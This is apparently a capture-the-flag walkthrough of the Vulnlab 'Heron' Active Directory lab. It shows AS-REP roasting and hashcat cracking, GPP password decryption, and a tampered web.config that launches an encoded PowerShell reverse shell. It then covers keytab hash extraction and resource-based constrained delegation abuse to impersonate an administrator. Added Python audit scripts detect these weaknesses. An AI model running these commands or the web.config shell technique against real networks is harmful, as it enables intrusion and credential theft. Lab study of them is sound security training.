Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
$krb5asrep$23$samuel.davies@HERON.VL:5253809049f054f80bde543e1a85bd56$d72a41d4e4a470a8abb50153b4cf1b365c82e8d0be2c8b376559f2ceaeda11962b2ca2eb37e0fa3feae5cad46f8da6c4abc5d15c32a2b66651c5846f21755d587d8996a83f9e34bddd777f420f6da1061da0c33fd594c0432c9cf69ad6fb7c881858578ca9870cefffaf7c0a34f9deca4209cdf8a0e0a9b971a32e01744bc98c1f69d1dfd32d19e95124c7f9603adc9b139971aad3354ea4e2a1d1e23df6bb70fa57d9e967c98972058a1510e3b8f5ff0c55e45f35478fa0437e1119d2ad36e4d54d2695a6f545ea0a8f46b3b053a154f61d66fa8755d7d8676d71ec6f45aa40163b2101
[-] invalid principal syntax
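The two account settings this write-up relies on, "do not require Kerberos preauthentication" here and "constrained delegation with protocol transition" for gMSA01$ in the Tengu section, are both bits of the userAccountControl attribute. As an added example that is not part of the write-up's tooling, this audit decodes that bitmask over constructed LDAP-style records and reports both conditions; SAMPLE_RECORDS and the flag values assigned to each account are assumptions modelled on the accounts named above.

```python
"""Audit userAccountControl for AS-REP roastable and protocol-transition accounts.

Added example, not from the write-up. Input records are dicts shaped like LDAP
search results; the sample data at the bottom is constructed for illustration.
"""

# userAccountControl bit values (MS-ADTS / MS-SAMR).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000                 # what GetNPUsers looks for
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # "Constrained w/ Protocol Transition" in findDelegation


def decode_uac(value):
    """Return the names of all set flags in ascending bit order; unknown bits as hex."""
    return [UAC_FLAGS.get(1 << bit, hex(1 << bit)) for bit in range(32) if value & (1 << bit)]


def audit_accounts(records):
    """Return (sAMAccountName, finding) pairs for enabled accounts with either risky bit set.

    Each record needs sAMAccountName and userAccountControl (int or decimal string);
    msDS-AllowedToDelegateTo (list of SPNs) is used when present.
    """
    findings = []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if uac & ACCOUNTDISABLE:
            continue  # a disabled account can neither be roasted nor perform S4U
        name = rec["sAMAccountName"]
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "AS-REP roastable: DONT_REQ_PREAUTH set"))
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            targets = ", ".join(rec.get("msDS-AllowedToDelegateTo", [])) or "<no SPNs listed>"
            findings.append((name, f"protocol transition (S4U2self) allowed towards: {targets}"))
    return findings


# Constructed sample records modelled on the accounts named in the write-up.
SAMPLE_RECORDS = [
    {"sAMAccountName": "samuel.davies", "userAccountControl": 0x400200},
    {"sAMAccountName": "wayne.wood", "userAccountControl": 0x10200},
    {"sAMAccountName": "gMSA01$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/sql.tengu.vl:1433", "MSSQLSvc/sql.tengu.vl"]},
    {"sAMAccountName": "old.svc", "userAccountControl": 0x400202},  # disabled: not reported
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(f"{rec['sAMAccountName']:15} {decode_uac(int(rec['userAccountControl']))}")
    for name, finding in audit_accounts(SAMPLE_RECORDS):
        print(f"FINDING {name}: {finding}")
```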
We crack this with hashcat; AS-REP roasting uses hashcat mode 18200:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ hashcat -m 18200 -o cracked4.txt hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$samuel.davies@HERON.VL:5253809049f054...3b2101
Time.Started.....: Fri Aug  2 15:06:30 2024 (0 secs)
Time.Estimated...: Fri Aug  2 15:06:30 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)

Started: Fri Aug  2 15:06:29 2024
Stopped: Fri Aug  2 15:06:32 2024
With the password found, we do a BloodHound enum:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 bloodhound-python -d 'heron.vl' -u 'samuel.davies' -p 'l6<redacted>oN' -c all -ns 10.10.148.85 --zip
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
INFO: Found AD domain: heron.vl
INFO: Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 5 computers
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
INFO: Found 28 users
INFO: Found 59 groups
INFO: Found 5 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frajmp.heron.vl
INFO: Querying computer:
INFO: Querying computer:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.86:445
INFO: Querying computer:
INFO: Querying computer: mucdc.heron.vl
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 <--socket error or timeout!
 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
INFO: Done in 00M 07S
INFO: Compressing output into 20240802151131_bloodhound.zip
Getting more users with ldapsearch:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 ldapsearch -x -LLL -H ldap://mucdc.heron.vl -D 'samuel.davies@heron.vl' -b 'DC=heron,DC=vl' -w 'l6<redacted>oN' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
SMB enum
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient -L 10.10.148.85 -U 'samuel.davies'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
Password for [WORKGROUP\samuel.davies]:

        Sharename       Type      Comment
        ---------       ----      -------
        accounting$     Disk
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        CertEnroll      Disk      Active Directory Certificate Services share
        home$           Disk
        IPC$            IPC       Remote IPC
        it$             Disk
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
        transfer$       Disk
Reconnecting with SMB1 for workgroup listing.
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:139 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:139 ... OK
do_connect: Connection to 10.10.148.85 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Connecting to SMB, we find Groups.xml with a password in it:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\SYSVOL -U 'samuel.davies'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\samuel.davies]:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 26 11:37:40 2024
  ..                                  D        0  Sun May 26 11:37:40 2024
  heron.vl                           Dr        0  Sun May 26 11:37:40 2024

                6261499 blocks of size 4096. 1958913 blocks available
smb: \> cd heron.vl
smb: \heron.vl\> ls
  .                                   D        0  Sun May 26 11:38:59 2024
  ..                                  D        0  Sun May 26 11:37:40 2024
  DfsrPrivate                      DHSr        0  Sun May 26 11:38:59 2024
  Policies                            D        0  Tue Jun  4 17:57:41 2024
  scripts                             D        0  Sun Jun  2 12:42:56 2024

                6261499 blocks of size 4096. 1958913 blocks available
smb: \heron.vl\> cd Policies
smb: \heron.vl\Policies\> ls
  .                                         D        0  Tue Jun  4 17:57:41 2024
  ..                                        D        0  Sun May 26 11:38:59 2024
  {31B2F340-016D-11D2-945F-00C04FB984F9}    D        0  Sun May 26 11:37:44 2024
  {3FFDA928-A6D1-4860-936F-25D9D2D7EAEF}    D        0  Sun May 26 12:21:54 2024
  {6AC1786C-016F-11D2-945F-00C04fB984F9}    D        0  Sun May 26 11:37:44 2024
  {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}    D        0  Tue Jun  4 17:57:41 2024
  {866ECED1-24B0-46EF-92F5-652345A1820C}    D        0  Sun May 26 12:23:29 2024

                6261499 blocks of size 4096. 1958912 blocks available
smb: \heron.vl\Policies\> cd {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> ls
  .                                   D        0  Tue Jun  4 17:57:41 2024
  ..                                  D        0  Tue Jun  4 17:57:41 2024
  GPT.INI                             A       59  Tue Jun  4 18:00:13 2024
  Machine                             D        0  Tue Jun  4 17:59:44 2024
  User                                D        0  Tue Jun  4 17:57:41 2024

                6261499 blocks of size 4096. 1958910 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> cd Machine
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:57:41 2024
  Preferences                         D        0  Tue Jun  4 17:59:44 2024

                6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> cd Preferences
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:59:44 2024
  Groups                              D        0  Tue Jun  4 17:59:44 2024

                6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> cd Groups
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:59:44 2024
  Groups.xml                          A     1135  Tue Jun  4 18:01:07 2024

                6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> get Groups.xml
getting file \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\Groups.xml of size 1135 as Groups.xml (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\>
The cpassword in Groups.xml is GPP-encrypted; decrypt it with gpp-decrypt (install its dependencies first):
pip3 install pycryptodome colorama
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py
usage: python3 gpp-decrypt.py -f [groups.xml]
gpp-decrypt.py: error: one of the arguments -f/--file -c/--cpassword is required
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py -c 1G19pP9gbIPUr5xLeKhEUg==
[ * ] Password: H3<redacted>#!
puck@edge-meppel:~/gpp-decrypt$
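To find the same exposure from the defender's side, here is an added example (my own code, not from the write-up or the gpp-decrypt tool) that walks a copy of the Policies tree, reports every cpassword attribute it finds and, when pycryptodome is installed, decrypts it with the AES key Microsoft published for Group Policy Preferences. The Groups.xml it scans is constructed and carries a widely published test vector instead of this chain's value; the directory layout it builds is an assumption mirroring SYSVOL.

```python
import base64, os, tempfile
import xml.etree.ElementTree as ET
from typing import List, Optional

# 32-byte AES key Microsoft published for Group Policy Preferences (MS-GPPREF).
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# Constructed Groups.xml. The cpassword is a widely published test vector that
# decrypts to "GPPstillStandingStrong2k18", not the value from this chain.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc-constructed">
    <Properties action="U" userName="svc-constructed" neverExpires="1"
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"/>
  </User>
</Groups>"""

def decrypt_cpassword(cpassword: str) -> Optional[str]:
    """AES-256-CBC with the published key and a zero IV; None without pycryptodome."""
    try:
        from Crypto.Cipher import AES  # pycryptodome, optional dependency
    except ImportError:
        return None
    # GPP stores base64 without the trailing '=' padding; restore it first.
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    plain = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16).decrypt(raw)
    pad = plain[-1]                     # PKCS#7 padding length
    if not 1 <= pad <= 16:
        return None
    return plain[:-pad].decode("utf-16-le", errors="replace")

def find_cpasswords(root_dir: str) -> List[dict]:
    """Walk a Policies tree and collect every non-empty cpassword attribute."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            if not name.lower().endswith(".xml"):
                continue
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue                # not an XML preference file
            for props in tree.iter("Properties"):
                cpw = props.get("cpassword")
                if cpw:                 # cpassword="" holds no secret
                    findings.append({"file": path, "cpassword": cpw,
                                     "user": props.get("userName") or props.get("runAs"),
                                     "plaintext": decrypt_cpassword(cpw)})
    return findings

def write_sample_policies() -> str:
    """Create a temp dir shaped like Policies\\{GUID}\\Machine\\Preferences\\Groups."""
    base = tempfile.mkdtemp()
    gdir = os.path.join(base, "{GUID-CONSTRUCTED}", "Machine", "Preferences", "Groups")
    os.makedirs(gdir)
    with open(os.path.join(gdir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return base
```

Since MS14-025 Windows no longer writes cpassword into new preference items, but entries created before the patch stay in SYSVOL until someone deletes them, and those stale entries are what this finds.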
With the H3<redacted>#! password, which is valid for the user svc-web-accounting-d, we can access SMB:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\accounting$ -U 'svc-web-accounting-d'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\svc-web-accounting-d]:H3r<redacted>#!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                                      D        0  Fri Jun  7 08:14:04 2024
  ..                                                   DHS        0  Sun Jun  2 17:26:14 2024
  AccountingApp.deps.json                                A    37407  Sun Jun  2 21:25:26 2024
  AccountingApp.dll                                      A    89600  Sun Jun  2 21:25:26 2024
  AccountingApp.exe                                      A   140800  Sun Jun  2 21:25:26 2024
  AccountingApp.pdb                                      A    39488  Sun Jun  2 21:25:26 2024
  AccountingApp.runtimeconfig.json                       A      557  Sun Jun  2 00:22:20 2024
  appsettings.Development.json                           A      127  Sun Jun  2 00:00:54 2024
  appsettings.json                                       A      237  Sun Jun  2 00:03:50 2024
  FinanceApp.db                                          A   106496  Sat Jun  1 16:09:00 2024
  Microsoft.AspNetCore.Authentication.Negotiate.dll      A    53920  Wed Nov  1 10:08:26 2023
  Microsoft.AspNetCore.Cryptography.Internal.dll         A    52912  Mon May 20 14:23:52 2024
  Microsoft.AspNetCore.Cryptography.KeyDerivation.dll    A    23712  Mon May 20 14:23:56 2024
  Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll  A   108808  Mon May 20 14:24:24 2024
  Microsoft.Data.Sqlite.dll                              A   172992  Mon May 20 09:54:40 2024
  Microsoft.EntityFrameworkCore.Abstractions.dll         A    34848  Mon May 20 09:54:30 2024
  Microsoft.EntityFrameworkCore.dll                      A  2533312  Mon May 20 09:55:04 2024
  Microsoft.EntityFrameworkCore.Relational.dll           A  1991616  Mon May 20 09:55:20 2024
  Microsoft.EntityFrameworkCore.Sqlite.dll               A   257456  Mon May 20 09:55:30 2024
  Microsoft.Extensions.DependencyModel.dll               A    79624  Tue Oct 31 23:59:24 2023
  Microsoft.Extensions.Identity.Core.dll                 A   177840  Mon May 20 14:24:10 2024
  Microsoft.Extensions.Identity.Stores.dll               A    45232  Mon May 20 14:24:20 2024
  Microsoft.Extensions.Options.dll                       A    64776  Thu Jan 18 12:05:26 2024
  runtimes                                               D        0  Sat Jun  1 16:51:32 2024
  SQLitePCLRaw.batteries_v2.dll                          A     5120  Thu Aug 24 04:41:24 2023
  SQLitePCLRaw.core.dll                                  A    50688  Thu Aug 24 04:38:38 2023
  SQLitePCLRaw.provider.e_sqlite3.dll                    A    35840  Thu Aug 24 04:38:52 2023
  System.DirectoryServices.Protocols.dll                 A    71944  Wed Nov  1 00:00:24 2023
  web.config                                             A      554  Thu Jun  6 16:41:39 2024
  wwwroot                                                D        0  Sat Jun  1 16:51:32 2024

		6261499 blocks of size 4096. 1957663 blocks available
smb: \>
We delete web.config from the share and upload a modified web.config in its place. I used this one:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="powershell" arguments="-e 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" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
Then I opened http://accounting.heron.vl in Firefox through proxychains, logged in as svc-web-accounting-d with the H3<redacted>#! password, and visited http://accounting.heron.vl/execute.now to trigger the handler. Alternatively, do it with curl like this:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains curl -u:svc-web-accounting:H3<redacted>#! http://accounting.heron.vl/execute.now
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... accounting.heron.vl:80 ... OK
and caught the reverse shell on my Kali box:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.177.37] 58560
PS C:\webaccounting> cd c:\windows\scripts
PS C:\windows\scripts> dir

    Directory: C:\windows\scripts

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----           6/6/2024  7:12 AM           1416 dns.ps1
-a----           6/1/2024  8:26 AM            221 ssh.ps1

PS C:\windows\scripts> type ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "De<redacted>lt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
PS C:\windows\scripts>
I checked with Get-MpComputerStatus that Defender is running on MUCDC; it kills the session after about one minute, so visit http://accounting.heron.vl/execute.now again if you need more time.
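The foothold above works because the web root share is writable and IIS reloads web.config as soon as it changes, so a periodic check of that file is a cheap detection. The following is an added example (my own code, not the write-up's or the application's) that parses the <handlers> and <aspNetCore> elements and reports deviations from a known-good hosting setup; the expected process paths and both sample configs are assumptions made for this example, with a placeholder instead of the encoded payload.

```python
import xml.etree.ElementTree as ET
from typing import List

# Process paths a published ASP.NET Core app is expected to use. Assumed for
# this example; take them from the app's known-good web.config in practice.
EXPECTED_PROCESS_PATHS = {"dotnet", ".\\AccountingApp.exe", "AccountingApp.exe"}
# PowerShell switches that make the hosted "process" an encoded command.
ENCODED_CMD_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}

def check_web_config(xml_text: str) -> List[str]:
    """Return findings for a web.config; an empty list means nothing suspicious."""
    findings = []
    root = ET.fromstring(xml_text)
    for asp in root.iter("aspNetCore"):
        proc = asp.get("processPath", "")
        args = asp.get("arguments", "").split()
        if proc not in EXPECTED_PROCESS_PATHS:
            findings.append(f"processPath '{proc}' is not the application host")
        if any(tok.lower() in ENCODED_CMD_FLAGS for tok in args):
            findings.append("arguments pass an encoded command to the process")
    for add in root.iter("add"):
        # The module normally owns every request ("*"); binding it to one
        # path turns that URL into a trigger that is invisible in the app code.
        if add.get("modules", "").startswith("AspNetCoreModule") and add.get("path") != "*":
            findings.append(f"AspNetCore handler bound to '{add.get('path')}' instead of '*'")
    return findings

# Constructed known-good config for an in-process published app.
GOOD_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="dotnet" arguments=".\\AccountingApp.dll" hostingModel="inprocess" />
    </system.webServer>
  </location>
</configuration>"""

# Constructed copy of the tampered shape; PLACEHOLDER stands in for the
# base64 payload, which is deliberately not reproduced here.
TAMPERED_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="powershell" arguments="-e PLACEHOLDER" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>"""
```

Pair this with a file hash baseline of the deployment directory; the check explains what changed, the hash tells you that something did.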
Privesc on the Ubuntu box:
pentest@frajmp:/tmp$ su _local
Password:
_local@frajmp:/tmp$ sudo -l
[sudo] password for _local:
Matching Defaults entries for _local on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User _local may run the following commands on localhost:
    (ALL : ALL) ALL
_local@frajmp:/tmp$ sudo su
root@frajmp:/tmp# cd /root
root@frajmp:~# ls
flag.txt  snap
root@frajmp:~# cat flag.txt
VL{51<redacted>60}
Transfer /etc/krb5.keytab to the Kali box with nc and run keytabextract.py on it:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
	REALM : HERON.VL
	SERVICE PRINCIPAL : FRAJMP$/
	NTLM HASH : 6f<redacted>f7
	AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
	AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
We do some more enumeration and find that Depl<redacted>Dealt works as the password for julian.pratt:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.134.197\\home$ -U 'julian.pratt'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\julian.pratt]: Depl<redacted>Dealt
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:445 ... OK
Try "help" to get a list of possible commands.
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
  .                                   D        0  Sun Jun  2 12:47:14 2024
  ..                                  D        0  Sat Jun  1 17:10:46 2024
  frajmp.lnk                          A     1443  Sun Jun  2 12:47:47 2024
  Is there a way to -auto login- in PuTTY with a password- - Super User.url      A      117  Sat Jun  1 17:44:44 2024
  Microsoft Edge.lnk                  A     2312  Sat Jun  1 17:44:38 2024
  mucjmp.lnk                          A     1441  Sun Jun  2 12:47:33 2024

		6261499 blocks of size 4096. 1985339 blocks available
smb: \Julian.Pratt\> mget *.lnk
Get file frajmp.lnk? y
getting file \Julian.Pratt\frajmp.lnk of size 1443 as frajmp.lnk (17.2 KiloBytes/sec) (average 17.2 KiloBytes/sec)
Get file Microsoft Edge.lnk? y
getting file \Julian.Pratt\Microsoft Edge.lnk of size 2312 as Microsoft Edge.lnk (26.9 KiloBytes/sec) (average 22.1 KiloBytes/sec)
Get file mucjmp.lnk? y
getting file \Julian.Pratt\mucjmp.lnk of size 1441 as mucjmp.lnk (17.8 KiloBytes/sec) (average 20.7 KiloBytes/sec)
smb: \Julian.Pratt\>
From BloodHound, we find that adm_prju is a member of the ADMINS_T1 group, which has the WriteAccountRestrictions privilege over MUCDC. Having WriteAccountRestrictions means that adm_prju has write access to all of the attributes on the machine, notably msDS-AllowedToActOnBehalfOfOtherIdentity. If we have the ability to modify this attribute, we can abuse resource-based constrained delegation.
Next, set up the RBCD (Resource-Based Constrained Delegation) by writing that attribute:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip 10.10.165.85 -action 'write' 'heron.vl/adm_prju:ay<redacted>B4'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:389 ... OK
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FRAJMP$ can now impersonate users on MUCDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FRAJMP$   (S-1-5-21-1568358163-2901064146-3316491674-27101)
Get the ticket
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate '_admin' 'heron.vl/FRAJMP$' -hashes :6f<redacted>f7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... HERON.VL:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... HERON.VL:88 ... OK
[*] Impersonating _admin
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:1080 ... heron.vl:88 ... OK
